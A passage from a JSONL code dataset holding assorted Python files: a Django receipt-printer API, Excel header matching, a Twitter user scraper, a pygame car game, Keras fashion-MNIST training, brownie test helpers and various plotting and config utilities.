logStreamNamePrefix=self.resource_names.get_log_stream_name()\n )\n \n if response['logStreams']:\n return True\n\n return False\n\n def create_resource(self) -> None:\n self.cloud_watch_logs.create_log_stream(\n logGroupName=self.resource_names.get_log_group_name(),\n logStreamName=self.resource_names.get_log_stream_name()\n )\n \n return\n ","sub_path":"resources/resource_log_stream.py","file_name":"resource_log_stream.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278411666","text":"from base64 import b64encode\r\nimport json\r\n\r\nfrom django.core.files.base import ContentFile\r\nfrom django.http import HttpResponse\r\nfrom django.http import JsonResponse\r\nfrom django.template.loader import render_to_string\r\nfrom wsgiref.util import FileWrapper\r\n\r\nimport django_rq\r\nimport requests\r\n\r\nfrom .models import Check, Printer\r\nfrom .worker import create_pdf\r\n\r\n\r\nclass PrinterApiService:\r\n @staticmethod\r\n def create_checks(order):\r\n \"\"\"\r\n Создает чеки для всех принтеров точки указанной в заказе и \r\n ставит ассинхронные задачи на генерацию pdf файлов для этих чеков.\r\n\r\n Args:\r\n order (str): String with json content describing an order\r\n\r\n Returns: \r\n JsonResponse\r\n \"\"\"\r\n try:\r\n order = json.loads(order)\r\n except:\r\n raise TypeError(\"Invalid json in order field\")\r\n \r\n printers = Printer.objects.filter(point_id=order['point_id'])\r\n if not printers:\r\n return JsonResponse({\"error\": \"Для данной точки не настроено ни одного принтера\"}, status=400)\r\n\r\n checks = Check.objects.filter(printer_id__in=printers.values('pk'), order=order)\r\n printers = printers.exclude(pk__in=checks.values('printer_id__pk'))\r\n\r\n if checks and not printers:\r\n return JsonResponse({\"error\": \"Для данного заказа уже созданы чеки\"}, status=400)\r\n\r\n if printers: \r\n new_checks = []\r\n for printer in printers:\r\n new_checks.append(Check(printer_id=printer, type=printer.check_type, order=order))\r\n\r\n created_checks = Check.objects.bulk_create(new_checks)\r\n\r\n for check in created_checks:\r\n django_rq.enqueue(create_pdf, check_id=check.id)\r\n \r\n if created_checks:\r\n return JsonResponse({\"ok\": \"Чеки успешно созданы\"}, status=200)\r\n \r\n return JsonResponse({\"error\": \"Something went wrong\"}, status=500)\r\n\r\n @staticmethod\r\n def get_rendered_checks(api_key):\r\n \"\"\"\r\n Возвращает список чеков доступных для печати.\r\n \r\n Args:\r\n api_key (str): Printer's api_key\r\n\r\n Returns:\r\n JsonResponse\r\n \"\"\"\r\n printers = Printer.objects.filter(api_key=api_key)\r\n if printers:\r\n checks_ids = Check.objects.filter(\r\n printer_id__in=printers.values('id'), \r\n status='rendered'\r\n ).exclude(pdf_file='').values('id')\r\n return JsonResponse({'checks': list(checks_ids)}, status=200)\r\n\r\n return JsonResponse({\"error\": \"Ошибка авторизации\"}, status=401)\r\n \r\n @staticmethod\r\n def get_pdf_check(api_key, check_id):\r\n \"\"\"\r\n Возвращает pdf файл чека.\r\n\r\n Args:\r\n api_key (str): Printer's api_key\r\n check_id (int): Check's id\r\n \r\n Returns: \r\n HttpResponse (application/pdf): If file exists\r\n JsonResponse: otherwise\r\n \"\"\"\r\n printers = Printer.objects.filter(api_key=api_key)\r\n \r\n if printers:\r\n try:\r\n check = Check.objects.get(printer_id__in=printers.values('id'), pk=check_id)\r\n if check.pdf_file:\r\n pdf_file = open(check.pdf_file.path, 'rb')\r\n response = HttpResponse(FileWrapper(pdf_file), content_type='application/pdf')\r\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' % check.pdf_file.name\r\n return response\r\n else:\r\n return JsonResponse({'error': \"Для данного чека не сгенерирован PDF-файл\"}, status=400)\r\n except Check.DoesNotExist:\r\n return JsonResponse({'error': \"Данного чека не существует\"}, status=400)\r\n\r\n return JsonResponse({\"error\": \"Ошибка авторизации\"}, status=401)\r\n","sub_path":"printer_api/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"532268389","text":"\"\"\"These functions mainly help with finding a worksheet's header row.\"\"\"\n\n# --- Standard Library Imports ------------------------------------------------\nfrom difflib import SequenceMatcher\nimport statistics\n\n# --- Third Party Imports -----------------------------------------------------\n# None\n\n# --- Intra-Package Imports ---------------------------------------------------\nfrom excelerator.main import excel_interface\n\n\n# --- HEADERS -----------------------------------------------------------------\n\ndef get_best_match_row_number(worksheet, values, max_row=20):\n \"\"\"Find the row that best matches a set of values.\n :param worksheet: openpyxl Worksheet object\n :param values: collection of row values you expect to find.\n :param max_row: function searches rows from 1 to max_row\n :return: row number (1-indexed) that best matches the provided values\n \"\"\"\n last_row = min(max_row, worksheet.max_row)\n rows = [excel_interface.get_worksheet_row(worksheet, row) for row in range(1, last_row + 1)]\n best_index = find_most_similar_string_sequence(values, rows)\n return best_index + 1\n\n\n# --- STRING ANALYSIS ---------------------------------------------------------\n\ndef best_similarity_ratio(value: str, strings: list): #, return_ratio=False):\n \"\"\"Return the best match to a given string.\"\"\"\n string = str(value)\n # if len(strings) == 0:\n # if return_ratio:\n # return 0\n # else:\n # return None\n ratios = [\n SequenceMatcher(None, string, str(orig_string)).ratio()\n for orig_string in strings\n ]\n max_ratio = max(ratios)\n # if return_ratio:\n # return max_ratio\n # else:\n # index = ratios.index(max_ratio)\n # return strings[index]\n return max_ratio\n\n\n# def map_one_string_to_another(expected_strings: set, actual_strings: set):\n# \"\"\"\n# Maps field names to their exact or best matches in pandas dataframe.\n# :param expected_strings: strings for whom we seek the best match\n# :param actual_strings: available strings\n# :return: dict[expected_string] = actual_string\n# \"\"\"\n#\n# # --- Setup ---------------------------------------------------------------\n# result = {}\n#\n# # --- Get exact matches ---------------------------------------------------\n# for string in expected_strings & actual_strings:\n# result[string] = string\n# remaining_expected = list(expected_strings - actual_strings)\n# remaining_actual = list(actual_strings - expected_strings)\n#\n# # --- Order expected strings by best match --------------------------------\n# def sort_by_match_ratio_then_alphbetical(input_string):\n# ratio = find_most_similar_string(\n# value=input_string,\n# strings=list(remaining_expected),\n# return_ratio=True,\n# )\n# return ratio, input_string\n# remaining_expected.sort(key=sort_by_match_ratio_then_alphbetical)\n#\n# # --- Find best match for each remaining string ---------------------------\n# for string in remaining_expected:\n# best_actual = find_most_similar_string(string, remaining_actual)\n# result[string] = best_actual\n# if best_actual is not None:\n# remaining_actual.remove(best_actual)\n#\n# # --- Return result -------------------------------------------------------\n# return result\n\n\ndef similarity_between_two_strings(input_strings, output_strings):\n match_ratios = [best_similarity_ratio(string, output_strings) for string in input_strings]\n return statistics.mean(match_ratios)\n\n\ndef find_most_similar_string_sequence(expected_string_sequence, list_of_actual_string_sequences):\n similarity_ratios = [\n similarity_between_two_strings(expected_string_sequence, actual_sequence)\n for actual_sequence in list_of_actual_string_sequences\n ]\n best_ratio = max(similarity_ratios)\n best_index = similarity_ratios.index(best_ratio)\n return best_index\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"excelerator/main/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"242330002","text":"#!/usr/lib/python\n\nimport BeautifulSoup\nimport urllib2\nimport sys\n\nif __name__ == \"__main__\":\n\tSEARCH_CRITERIA = { \"tweets\" : \"/pages/tweets\", \"following\" : \"/pages/friends\", \"followers\" : \"/pages/100\" }\n\n\tstd_timezone = \"Vienna\"\n\tstd_criteria = SEARCH_CRITERIA[\"tweets\"]\n\tstd_output_file = \"userlist.txt\"\n\n\tif len(sys.argv) == 4:\n\t\tcrit = sys.argv[1]\t\t\n\t\tif crit in SEARCH_CRITERIA:\n\t\t\tcriteria = SEARCH_CRITERIA[crit]\n\t\telse:\n\t\t\tcriteria = std_criteria\n\t\ttimezone = sys.argv[2]\n\t\toutput_file = sys.argv[3]\n\telse:\n\t\tcriteria = std_criteria\n\t\ttimezone = std_timezone\n\t\toutput_file = std_output_file\n\n\turl = \"http://twittercounter.com\" + criteria + \"?time_zone=\" + timezone\n\tcontent = urllib2.urlopen(url).read()\n\tsoup = BeautifulSoup.BeautifulSoup(content)\n\tuser_divs = soup.findAll(\"div\", attrs={\"class\" : \"clr\"})\n\n\tanchors = [u.a for u in user_divs]\n\n\twith open(output_file, \"w\") as f:\n\t\tfor anchor in anchors[1:]:\t\n\t\t\tf.write(anchor.get(\"href\")[1:] + \"\\n\")\n","sub_path":"TwitterUserLists/twitterusers.py","file_name":"twitterusers.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457215370","text":"import re\n\ntext = 'ksdv vefer 2 asdv 23 vsdfv43vf 66 vf77'\n\naRegex = re.compile(r'\\d\\d')\nmo = aRegex.search(text)\nmo2 = aRegex.findall(text)\n\nprint(mo.group())\nprint(mo)\nprint(mo2)\n","sub_path":"re.py","file_name":"re.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"366909955","text":"import sys\nfrom PyQt4 import QtGui\nfrom PIL import Image\n\ndef get_pil_image(w, h):\n clr = chr(0)+chr(255)+chr(0)\n f = open(r\"C:\\Program Files\\WinDbg\\WinDbg(x86)\\2C1BC020image.txt\", \"r\")\n im = Image.frombytes(\"RGBA\", (w,h), f.read())\n return im\n\ndef pil2qpixmap(w, h):\n # w, h = pil_image.size\n # data = pil_image.tobytes(\"raw\", \"BGRX\")\n f = open(r\"C:\\Program Files\\WinDbg\\WinDbg(x86)\\2C1BC020image.txt\", \"r\")\n data = f.read()\n # print data\n qimage = QtGui.QImage(data, w, h, QtGui.QImage.Format_RGB32)\n # qpixmap = QtGui.QPixmap(w,h)\n pix = QtGui.QPixmap.fromImage(qimage)\n return pix\n\nclass ImageLabel(QtGui.QLabel):\n def __init__(self, parent=None):\n QtGui.QLabel.__init__(self, parent)\n\n self.setGeometry(300, 300, 1024, 1024)\n self.setWindowTitle('Window')\n\n f = open(r\"C:\\Program Files\\WinDbg\\WinDbg(x86)\\2C1BC020image.txt\", \"r\")\n data = f.read()\n f.close()\n self.data = data\n qimage = QtGui.QImage(data, 1024,1024, QtGui.QImage.Format_RGB32)\n self.pix = QtGui.QPixmap.fromImage(qimage)\n self.setPixmap(self.pix)\n\napp = QtGui.QApplication(sys.argv)\nimageLabel = ImageLabel()\nimageLabel.show()\nsys.exit(app.exec_())","sub_path":"learn_py/gc/showBitmap - 副本.py","file_name":"showBitmap - 副本.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387737775","text":"\"\"\"Print the full configuration.\"\"\"\n\nimport ruamel.yaml\nimport re\nfrom . import DodoCommand\n\n\nclass Command(DodoCommand): # noqa\n def add_arguments_imp(self, parser): # noqa\n parser.add_argument('--key')\n\n def handle_imp(self, key, **kwargs): # noqa\n if key:\n print(\"%s\" % str(self.get_config(key, '')))\n else:\n content = re.sub(\n r'^([0-9_A-Z]+\\:)$',\n r'\\n\\1',\n ruamel.yaml.round_trip_dump(self.config),\n flags=re.MULTILINE\n )\n print(\n re.sub(\n r'^\\n\\n',\n r'\\n',\n content,\n flags=re.MULTILINE\n )\n )\n","sub_path":"dodo_commands/extra/standard_commands/print-config.py","file_name":"print-config.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125588956","text":"import argparse\nimport yaml\n\n\nclass Parser:\n \"\"\"\n Used for parsing command line inputs.\n \"\"\"\n\n def __init__(self): # noqa: CFQ001\n \"\"\"\n Constructor method for specifying default values.\n \"\"\"\n self.parser_field = argparse.ArgumentParser(description='Generate synthetic data')\n self.parser_field.add_argument('-m', '--materials', nargs='+',\n help=\"a list of materials generated in an image\",\n default=[\"Aluminium\"])\n self.parser_field.add_argument('-p', '--proportions', nargs='+',\n help=\"a list of proportions for each material specified\",\n type=int, default=[100])\n self.parser_field.add_argument('-c', '--objects_per_image',\n help=\"number of objects per image\", type=int, default=1)\n self.parser_field.add_argument('-i', '--image_count',\n help=\"number of images generated\", type=int, default=1)\n self.parser_field.add_argument('-b', '--background', help=\"name of background image file\",\n default='random')\n self.parser_field.add_argument('-o', '--output_location',\n help=\"path to image directory\", default=\"images/\")\n self.parser_field.add_argument('-rc', '--reuse_crushes',\n help=\"use existing crushed models instead of creating them\")\n self.parser_field.add_argument('-oc', '--only_crush',\n help=\"only crush the models of the given material,\"\n \" don't render images\")\n self.parser_field.add_argument('-dc', '--dont_crush',\n help=\"don't crush the models\")\n\n def parse_args(self, args):\n \"\"\"\n Parse the arguments.\n :param args: list with arguments to be parsed.\n :return: list with parsed arguments.\n \"\"\"\n parsed_args = self.parser_field.parse_args(args)\n self.validate_parsed_args(parsed_args)\n return parsed_args\n\n def validate_parsed_args(self, parsed_args):\n \"\"\"\n Validate if parsed arguments are valid.\n :param parsed_args: list with parsed arguments.\n :return: none or error if not valid\n \"\"\"\n if len(parsed_args.materials) != len(parsed_args.proportions):\n raise OSError('material list and proportions list should be of same size')\n if sum(parsed_args.proportions) != 100:\n raise OSError('proportions list should add up to 100')\n\n def parse_long_term_configuration(self, name):\n \"\"\"\n Parse long term configurations from yaml file.\n :name: path to the file with configurations.\n :return: dictionary containing configurations.\n \"\"\"\n with open(str(name)) as configuration:\n data = yaml.load(configuration, Loader=yaml.Loader)\n return data\n","sub_path":"src/util/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"699729","text":"import pygame\nimport random\nimport time\npygame.init()\n\nwidth, height = 500, 700\nscreen = pygame.display.set_mode((width, height))\npygame.display.set_caption('GTA VI')\nFPS = pygame.time.Clock()\n\ncar_x, car_y = 137, 520\necar_x, ecar_y = 0, 0\nspeed = 8\nroad = pygame.image.load('road.png')\ngameover = pygame.image.load('gameover.png')\ncoin = pygame.image.load('coin.png')\ncnt_coin = pygame.image.load('cnt_coin.png')\n \nfont = pygame.font.SysFont('bookantiqua', 35)\n\nclass Car(pygame.sprite.Sprite):\n def __init__(self):\n self.image = pygame.image.load('car.png')\n self.surf = pygame.Surface((car_x, car_y))\n\n def move(self):\n global car_x, car_y, speed\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and car_x >= 22:\n car_x -= speed\n elif keys[pygame.K_RIGHT] and car_x <= 390:\n car_x += speed\n \n def draw(self):\n screen.blit(self.image, (car_x, car_y))\n \n\nclass Enemy_car(pygame.sprite.Sprite):\n def __init__(self):\n self.image = pygame.image.load('enemy_car.png')\n self.surf = pygame.Surface((90, 170))\n self.spawn = [[20, -200], [142, -200], [273, -200], [387, -200]]\n self.spawn_point = random.randint(0, 3)\n self.speedometer = [6, 9, 12, 14, 16]\n self.speed = random.randint(0, 4)\n def move(self):\n global ecar_x, ecar_y\n self.spawn[self.spawn_point][1] += self.speedometer[self.speed]\n if self.spawn[self.spawn_point][1] >= height + 100:\n self.spawn[self.spawn_point][1] = -200\n self.spawn_point = random.randint(0, 3)\n self.speed = random.randint(0, 4)\n ecar_x = self.spawn[self.spawn_point][0]\n ecar_y = self.spawn[self.spawn_point][1]\n def draw(self):\n global ecar_x, ecar_y\n screen.blit(self.image, self.spawn[self.spawn_point])\n\nbg_y = 0\ndef background():\n global bg_y, speed\n screen.blit(road, (0, bg_y))\n screen.blit(road, (0, bg_y - height))\n if bg_y >= height: bg_y -= height\n bg_y += speed\n\nspawn = [random.randint(20, 430), -60]\ncnt = 0\ndef draw_coin():\n global spawn, cnt\n global car_x, car_y\n screen.blit(coin, (spawn[0], spawn[1]))\n if spawn[1] > height: spawn = [random.randint(20, 430), -60]\n if car_x - 45 < spawn[0] < car_x + 90 and car_y - 45 < spawn[1] < car_y + 170:\n cnt += 1\n spawn = [random.randint(20, 430), -60]\n spawn[1] += 6\n screen.blit(cnt_coin, (10, 10))\n screen.blit(font.render(str(cnt), 1, (255, 255, 0)), (45, 5))\n\ndef crush_test():\n global ecar_x, ecar_y\n global car_x, car_y\n if ecar_x - 85 < car_x < ecar_x + 85 and car_y < ecar_y < car_y + 170:\n return True\n\ncar = Car()\nenemy_car = Enemy_car()\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n if crush_test():\n screen.blit(gameover, (0, 0))\n screen.blit(font.render('COINS : ' + str(cnt), 1, (255, 255, 0)), (150, 500))\n else:\n background()\n draw_coin()\n car.move()\n enemy_car.move()\n car.draw()\n enemy_car.draw()\n pygame.display.update()\n FPS.tick(60)","sub_path":"TSIS8/gta.py","file_name":"gta.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"476726008","text":"from django.contrib import admin\nfrom django.contrib.auth.models import Group\n\nfrom users.models import AuthUser, LoggedLogin\n\n\n@admin.register(AuthUser)\nclass AuthUserAdmin(admin.ModelAdmin):\n def emails_sent(self, instance):\n return instance.sentemail_set.count()\n\n def address_subscriptions(self, instance):\n return instance.addresssubscription_set.count()\n\n def forwarding_addresses(self, instance):\n return instance.addressforwarding_set.count()\n\n list_display = (\n 'id',\n 'date_joined',\n 'email',\n 'emails_sent',\n 'address_subscriptions',\n 'forwarding_addresses',\n 'first_name',\n 'last_name',\n 'is_active',\n 'is_staff',\n 'is_superuser',\n 'creation_ip',\n 'creation_user_agent',\n )\n search_fields = ['first_name', 'last_name', 'email', ]\n list_filter = ('is_active', 'is_staff', 'is_superuser', )\n\n\n@admin.register(LoggedLogin)\nclass LoggedLoginAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'login_at',\n 'auth_user',\n 'ip_address',\n 'user_agent',\n )\n raw_id_fields = ('auth_user', )\n search_fields = ['ip_address', 'user_agent', ]\n\n\n# unregister the Group model from admin since we're not using Django's built-in permissions\nadmin.site.unregister(Group)\n","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560320961","text":"from brownie import accounts, Contract, chain\ntry:\n from brownie import interface\nexcept:\n pass\n\nCAKE = '0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82'\nWBNB = '0xbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c'\nALPHA = '0xa1faa113cbE53436Df28FF0aEe54275c13B40975'\nBUSD = '0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56'\nBYFI = '0x88f1A5ae2A3BF98AEAF342D26B30a79438c9142e'\n\n\ndef almostEqual(a, b, thresh=0.01):\n return a <= b + thresh * abs(b) and a >= b - thresh * abs(b)\n\n\ndef mint_tokens(token, to, interface=None, amount=None):\n if interface is None:\n interface = globals()['interface']\n\n token = interface.IAny(token)\n if amount is None:\n # default is 1M tokens\n amount = 10**12 * 10**token.decimals()\n\n if token == CAKE:\n owner = token.owner()\n token.mint(to, amount, {'from': owner})\n elif token == WBNB:\n token.deposit({'from': accounts[9], 'value': amount})\n token.transfer(to, amount, {'from': accounts[9]})\n elif token == ALPHA or token == BUSD:\n owner = token.owner()\n token.mint(amount, {'from': owner})\n token.transfer(to, amount, {'from': owner})\n else:\n raise Exception('tokens not supported')\n","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"14085772","text":"import plot_correlation as pltcorr\nimport plot_dist as pdi\nimport plot_explained_variance as pev\nimport plot_pc_map as pltmap\nimport plot_dendrogram as pd\nimport plot_pc_vs_poly_all as ppp\nimport plot_linkage_check as plc\nimport numpy as np\nfrom constants import const\nimport matplotlib.pyplot as plt\n\n\nC = const()\n\nnames_cal = C['names_cal']\nset_id_cal = C['set_id_cal']\nstrt_cal = C['strt_cal']\nns_cal = C['ns_cal']\ndir_cal = C['dir_cal']\n\nnames_val = C['names_val']\nset_id_val = C['set_id_val']\nstrt_val = C['strt_val']\nns_val = C['ns_val']\ndir_val = C['dir_val']\n\n# \"\"\"Plot an autocorrelation\"\"\"\n# sn = 0\n# iA = 1\n# iB = 1\n# pltcorr.pltcorr(ns_cal[0], set_id_cal[0], sn, iA, iB)\n\n# \"\"\"Plot the distances between clusters\"\"\"\n# pdi.pltdist()\n\n\"\"\"Plot the percentage explained variance\"\"\"\npev.variance()\n\n\"\"\"Plot the microstructures in PC space\"\"\"\npcA = 0\npcB = 1\npltmap.pltmap(ns_cal, names_cal, set_id_cal, 'cal', pcA, pcB)\npltmap.pltmap(ns_val, names_val, set_id_val, 'val', pcA, pcB)\n\n\"\"\"Plot a dendrogram\"\"\"\npd.pltdend(ns_val, set_id_val, names_val)\n\n\"\"\"Plot the errors versus number of PCs and polynomial order\"\"\"\nppp.pltpcpoly('modulus', 15)\nppp.pltpcpoly('strength', 15)\nppp.pltpcpoly('modulus', 150)\nppp.pltpcpoly('strength', 150)\n\n\"\"\"Plot the predicted versus actual values of the property of interest\"\"\"\nn_poly = 2\nplc.plot_check(ns_val, names_val, 'val', 'modulus', n_poly)\nplc.plot_check(ns_val, names_val, 'val', 'strength', n_poly)\nplt.show()\n","sub_path":"fip_collab/2016_07_04_polycrystal_rollett/main_plt.py","file_name":"main_plt.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"212021406","text":"from simtools.Managers.WorkItemManager import WorkItemManager\nfrom simtools.SetupParser import SetupParser\nfrom simtools.AssetManager.FileList import FileList\n\nwi_name = \"SSMT Analysis\"\ncommand = \"python run_analysis.py\"\nuser_files = FileList(root='files')\n\nif __name__ == \"__main__\":\n SetupParser.default_block = 'HPC'\n SetupParser.init()\n\n wim = WorkItemManager(item_name=wi_name, command=command, user_files=user_files,\n related_experiments=[\"39953ccf-e899-e811-a2c0-c4346bcb7275\"])\n wim.execute(True)","sub_path":"examples/SSMT/generic_ssmt/run_ssmt_analysis.py","file_name":"run_ssmt_analysis.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613916621","text":"# OneHotEncoding\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.datasets import fashion_mnist\r\n\r\n(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\r\n\r\nprint(x_train.shape, y_train.shape) # (60000, 28, 28) (60000,)\r\nprint(x_test.shape, y_test.shape) # (10000, 28, 28) (10000,)\r\n\r\n\r\nfrom keras.utils import np_utils\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\ny_train = to_categorical(y_train)\r\ny_test = to_categorical(y_test)\r\n\r\n\r\n\r\nx_train = x_train.reshape(60000,28,28,1).astype('float32')/255.\r\nx_test = x_test.reshape(10000,28,28,1).astype('float32')/255. # minmax scaler의 효과\r\n\r\n# print(x_train[0]) # 최대값은 255이다. 명암을 0 ~ 255 값으로 나타내었다.\r\n\r\n# 2. Model\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.layers import Conv2D\r\nfrom tensorflow.keras.layers import MaxPooling2D\r\nfrom tensorflow.keras.layers import Flatten\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(10,(2,2),padding='same',input_shape=(28,28,1))) # 28,28,60\r\nmodel.add(Conv2D(10,(2,2),padding='valid')) # 27,27,50\r\nmodel.add(Conv2D(10,(3,3))) # 25,25,40\r\nmodel.add(Conv2D(10,(2,2),strides=2)) # 12,12,30\r\nmodel.add(MaxPooling2D(pool_size=2)) # pool_size default : 2 # 6 ,6 ,30\r\nmodel.add(Flatten()) # 1080,\r\nmodel.add(Dense(10,activation='relu')) # 20,\r\nmodel.add(Dense(10,activation='softmax')) # 10,\r\nmodel.summary() \r\n\r\n# model save\r\nmodel.save(\"./save/keras50_1_save_model_1118_test01_1.h5\")\r\n\r\n\r\n# 3. 컴파일, 훈련\r\n\r\n# ES\r\nfrom tensorflow.keras.callbacks import EarlyStopping\r\nes = EarlyStopping(monitor='loss',patience=5, mode='auto')\r\n\r\n# ModelCheckPoint\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\nmodelpath = \"./model/keras50_1_save_model_1118-{epoch:02d}-{val_loss:.4f}.hdf5\" \r\n# 2d = 2자리수 정수, 4f = 소수 4째 자리까지\r\nmcp = ModelCheckpoint(filepath=modelpath, monitor='val_loss',\r\n save_best_only=True, mode=\"auto\")\r\n\r\n# Compile\r\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=[\"acc\"])\r\n\r\n# fit\r\nhist = model.fit(x_train,y_train, epochs=30,batch_size=32,verbose=1,\r\n validation_split=0.2,callbacks=[es,mcp])\r\n\r\n\r\nmodel.save(\"./save/keras50_1_save_model_1118_test01_2.h5\")\r\n\r\n\r\n\r\nloss = hist.history[\"loss\"]\r\nval_loss = hist.history[\"val_loss\"]\r\nacc = hist.history[\"acc\"]\r\nval_acc = hist.history[\"val_acc\"]\r\n\r\n# 4. 평가, 예측\r\nresult = model.evaluate(x_test,y_test,batch_size=32)\r\nprint(\"loss : \\n\",result[0])\r\nprint(\"accuracy : \\n\",result[1])\r\n\r\n# predict data\r\nx_pred = x_test[0:10]\r\ny_pred = y_test[0:10]\r\n\r\n# Y_class_recovery = np.argmax(Y_class_onehot, axis=1).reshape(-1,1)\r\ny_test_predict = model.predict([x_pred])\r\nytp_recovery = np.argmax(y_test_predict,axis=1)\r\ny_real = np.argmax(y_pred,axis=1)\r\n\r\nprint(\"예측값 : \",ytp_recovery)\r\nprint(\"실제값 : \",y_real)\r\n\r\n# 시각화\r\nimport matplotlib.pyplot as plt\r\nplt.figure(figsize=(10,6)) # 단위 무엇인지 찾아볼것\r\nplt.subplot(2,1,1) # 2행 1열 중 첫번째\r\nplt.plot(loss,marker='.',c='red',label='loss')\r\nplt.plot(val_loss,marker='.',c='blue',label='val_loss')\r\nplt.grid() # 모눈종이 모양으로 하겠다.\r\n\r\nplt.title('loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(loc='upper right')\r\n\r\nplt.subplot(2,1,2) # 2행 1열 중 두번째\r\nplt.plot(acc,marker='.',c='red')\r\nplt.plot(val_acc,marker='.',c='blue')\r\nplt.grid() # 모눈종이 모양으로 하겠다.\r\n\r\nplt.title('accuracy')\r\nplt.ylabel('acc')\r\nplt.xlabel('epoch')\r\nplt.legend(['acc','val_acc']) # 라벨의 위치를 명시해주지 않으면 알아서 빈곳에 노출한다.\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n# 1500/1500 [==============================] - 3s 2ms/step - loss: 0.2664 - acc: 0.9029 - val_loss: 0.3268 - val_acc: 0.8857\r\n# 313/313 [==============================] - 1s 2ms/step - loss: 0.3460 - acc: 0.8815\r\n# loss :\r\n# 0.34601864218711853\r\n# accuracy :\r\n# 0.8815000057220459\r\n# 예측값 : [9 2 1 1 6 1 4 6 5 7]\r\n# 실제값 : [9 2 1 1 6 1 4 6 5 7]\r\n","sub_path":"Study/keras/keras50_1_save_model_1118.py","file_name":"keras50_1_save_model_1118.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"151164461","text":"# -----------------------------------------------------------------------------\n#\n# This file is part of the ParaNut project.\n#\n# Copyright (C) 2023 Daniel Bortkevych \n# Oleg Murashko \n# Haris Vojic \n# Hochschule Augsburg, University of Applied Sciences\n#\n# Description:\n# The configuration class for ParaNut is implemented in this file\n#\n# --------------------- LICENSE -----------------------------------------------\n# Redistribution and use in source and binary forms, with or without \n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, \n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation \n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE \n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR \n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF \n# SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND \n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# -----------------------------------------------------------------------------\n\n## Unit class provides methods to get and set unit attributes.\nclass Unit:\n\n\t## Writes the \"config.mk\" file.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\tdef _write_unit(self, path = \".\"):\n\t\twith open(f'{path}/config.mk', \"a\") as config:\n\t\t\tfor key in self.__dict__.keys():\n\t\t\t\tattr = getattr(self, 